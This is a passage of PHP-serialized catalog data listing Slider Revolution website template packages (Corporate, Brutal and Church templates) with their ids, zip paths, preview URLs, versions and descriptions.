Website\";s:13:\"package_order\";s:2:\"18\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:365;a:25:{s:2:\"id\";s:3:\"390\";s:5:\"title\";s:23:\"Corporate Scroll To Top\";s:5:\"alias\";s:23:\"Corporate-Scroll-To-Top\";s:3:\"zip\";s:33:\"packs/Corporate-Scroll-To-Top.zip\";s:3:\"uid\";s:32:\"2d68f6e4590a9a445e6eb055dfee88ba\";s:3:\"img\";s:34:\"Corporate-Scroll-To-Top/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"19\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:366;a:25:{s:2:\"id\";s:3:\"402\";s:5:\"title\";s:23:\"Brutal Website Template\";s:5:\"alias\";s:23:\"brutal-website-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:31:\"brutal-website-template-package\";s:3:\"img\";s:36:\"packages/brutal-website-template.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:367;a:25:{s:2:\"id\";s:3:\"403\";s:5:\"title\";s:11:\"Brutal Menu\";s:5:\"alias\";s:11:\"brutal-menu\";s:3:\"zip\";s:21:\"packs/brutal-menu.zip\";s:3:\"uid\";s:32:\"04b21c7aee2479793336e964230d6e3f\";s:3:\"img\";s:22:\"brutal-menu/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:368;a:25:{s:2:\"id\";s:3:\"404\";s:5:\"title\";s:11:\"Brutal Hero\";s:5:\"alias\";s:11:\"brutal-hero\";s:3:\"zip\";s:21:\"packs/brutal-hero.zip\";s:3:\"uid\";s:32:\"a342ad01054b97bac7980fdf9e275b34\";s:3:\"img\";s:22:\"brutal-hero/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:369;a:25:{s:2:\"id\";s:3:\"405\";s:5:\"title\";s:12:\"Brutal About\";s:5:\"alias\";s:12:\"brutal-about\";s:3:\"zip\";s:22:\"packs/brutal-about.zip\";s:3:\"uid\";s:32:\"a3e1cd2e36c9a783c1932fdafe2e4434\";s:3:\"img\";s:23:\"brutal-about/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:370;a:25:{s:2:\"id\";s:3:\"406\";s:5:\"title\";s:16:\"Brutal Highlight\";s:5:\"alias\";s:16:\"brutal-highlight\";s:3:\"zip\";s:26:\"packs/brutal-highlight.zip\";s:3:\"uid\";s:32:\"b7f8522dcb4636467633bd3b14f4e3e9\";s:3:\"img\";s:27:\"brutal-highlight/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:371;a:25:{s:2:\"id\";s:3:\"407\";s:5:\"title\";s:15:\"Brutal Projects\";s:5:\"alias\";s:15:\"brutal-projects\";s:3:\"zip\";s:25:\"packs/brutal-projects.zip\";s:3:\"uid\";s:32:\"1a462e91373042193ca5d623dd8e8a47\";s:3:\"img\";s:26:\"brutal-projects/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:372;a:25:{s:2:\"id\";s:3:\"408\";s:5:\"title\";s:15:\"Brutal Services\";s:5:\"alias\";s:15:\"brutal-services\";s:3:\"zip\";s:25:\"packs/brutal-services.zip\";s:3:\"uid\";s:32:\"cbeeb1e7a5c2842b155fe13acb7c165d\";s:3:\"img\";s:26:\"brutal-services/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:373;a:25:{s:2:\"id\";s:3:\"409\";s:5:\"title\";s:14:\"Brutal Callout\";s:5:\"alias\";s:14:\"brutal-callout\";s:3:\"zip\";s:24:\"packs/brutal-callout.zip\";s:3:\"uid\";s:32:\"31b6dafdb2dfb548152653e60df5a3bc\";s:3:\"img\";s:25:\"brutal-callout/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:374;a:25:{s:2:\"id\";s:3:\"410\";s:5:\"title\";s:13:\"Brutal Footer\";s:5:\"alias\";s:13:\"brutal-footer\";s:3:\"zip\";s:23:\"packs/brutal-footer.zip\";s:3:\"uid\";s:32:\"07559f0c574e3dd95b2d40d72cbb01bc\";s:3:\"img\";s:24:\"brutal-footer/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/brutal-website-template/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Brutal Website Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"31\";s:9:\"installed\";b:0;}i:375;a:25:{s:2:\"id\";s:3:\"411\";s:5:\"title\";s:23:\"Church Website Template\";s:5:\"alias\";s:23:\"church-website-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:31:\"church-website-template-package\";s:3:\"img\";s:36:\"packages/church-website-template.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:376;a:25:{s:2:\"id\";s:3:\"412\";s:5:\"title\";s:13:\"Church Header\";s:5:\"alias\";s:13:\"Church-Header\";s:3:\"zip\";s:23:\"packs/Church-Header.zip\";s:3:\"uid\";s:32:\"c14289117e1e2b9ee716fb99146b2e03\";s:3:\"img\";s:24:\"Church-Header/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:377;a:25:{s:2:\"id\";s:3:\"413\";s:5:\"title\";s:22:\"Church Upcoming Events\";s:5:\"alias\";s:22:\"Church-Upcoming-Events\";s:3:\"zip\";s:32:\"packs/Church-Upcoming-Events.zip\";s:3:\"uid\";s:32:\"056a26efddae92973fee4ee5cfa75f10\";s:3:\"img\";s:33:\"Church-Upcoming-Events/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:378;a:25:{s:2:\"id\";s:3:\"414\";s:5:\"title\";s:12:\"Church About\";s:5:\"alias\";s:12:\"Church-About\";s:3:\"zip\";s:22:\"packs/Church-About.zip\";s:3:\"uid\";s:32:\"8ef133f3f669f06380334a83e27eedbb\";s:3:\"img\";s:23:\"Church-About/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:379;a:25:{s:2:\"id\";s:3:\"415\";s:5:\"title\";s:14:\"Church Pastors\";s:5:\"alias\";s:14:\"Church-Pastors\";s:3:\"zip\";s:24:\"packs/Church-Pastors.zip\";s:3:\"uid\";s:32:\"715edc0833a753b72350b8c974f86f94\";s:3:\"img\";s:25:\"Church-Pastors/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:380;a:25:{s:2:\"id\";s:3:\"416\";s:5:\"title\";s:20:\"Church Photo Gallery\";s:5:\"alias\";s:20:\"Church-Photo-Gallery\";s:3:\"zip\";s:30:\"packs/Church-Photo-Gallery.zip\";s:3:\"uid\";s:32:\"d94808a97149cd5d3b3354a28409ffd7\";s:3:\"img\";s:31:\"Church-Photo-Gallery/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:381;a:25:{s:2:\"id\";s:3:\"417\";s:5:\"title\";s:16:\"Church Community\";s:5:\"alias\";s:16:\"Church-Community\";s:3:\"zip\";s:26:\"packs/Church-Community.zip\";s:3:\"uid\";s:32:\"2244e6a6d7a691653eae2d70765130a7\";s:3:\"img\";s:27:\"Church-Community/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:382;a:25:{s:2:\"id\";s:3:\"418\";s:5:\"title\";s:13:\"Church Sermon\";s:5:\"alias\";s:13:\"Church-Sermon\";s:3:\"zip\";s:23:\"packs/Church-Sermon.zip\";s:3:\"uid\";s:32:\"8fedf983bd55fff0f7a16d9f0a7e5408\";s:3:\"img\";s:24:\"Church-Sermon/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:383;a:25:{s:2:\"id\";s:3:\"419\";s:5:\"title\";s:15:\"Church Contacts\";s:5:\"alias\";s:15:\"Church-Contacts\";s:3:\"zip\";s:25:\"packs/Church-Contacts.zip\";s:3:\"uid\";s:32:\"0b1a6968e75868548fd98e435625c090\";s:3:\"img\";s:26:\"Church-Contacts/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:384;a:25:{s:2:\"id\";s:3:\"420\";s:5:\"title\";s:13:\"Church 